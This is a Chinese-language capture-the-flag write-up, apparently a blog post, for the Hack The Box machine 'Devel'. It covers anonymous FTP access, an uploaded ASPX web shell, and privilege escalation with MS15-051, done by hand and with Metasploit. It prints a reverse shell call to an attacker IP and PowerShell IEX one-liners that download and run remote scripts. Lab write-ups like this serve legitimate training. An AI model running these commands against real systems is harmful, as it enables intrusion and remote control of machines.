htb-window-3-Devel-ftp-ms-msf

nmap

在这里插入图片描述

ftp

  • 匿名登陆
    在这里插入图片描述
  • 发现文件一样,推断该ftp是可以网址入口
    在这里插入图片描述

shell反弹和提权

shell直接反弹

  • 直接反弹不能持久-会失败
    在这里插入图片描述
    在这里插入图片描述

Invoke-Power反弹

cmdasp

  • 上传cmdasp.aspx
    在这里插入图片描述
    在这里插入图片描述

  • 测试
    在这里插入图片描述

  • 句末加入反弹语句

    Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.5 -Port 4444
    

    在这里插入图片描述

  • 靶机下载Invoke-PowerShellTcp.ps1

    powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5/Invoke-PowerShellTcp.ps1')"
    

    在这里插入图片描述

    在这里插入图片描述

system

  • sherlock发现漏洞

    powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5/Sherlock.ps1'); Find-AllVulns"
    

    在这里插入图片描述

  • 生成木马exe
    在这里插入图片描述

  • 下载对应的ms-ms15-051
    在这里插入图片描述
    在这里插入图片描述

  • 靶机下载ms和反弹shell(一般在C:\Users\Public)
    在这里插入图片描述

  • 获取flag
    在这里插入图片描述

msf

反弹shell

  • 木马和ftp上传
    在这里插入图片描述

  • 监听
    在这里插入图片描述

system

  • 查看漏洞
    在这里插入图片描述
  • 选ms15_051漏洞进行提权
    在这里插入图片描述
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值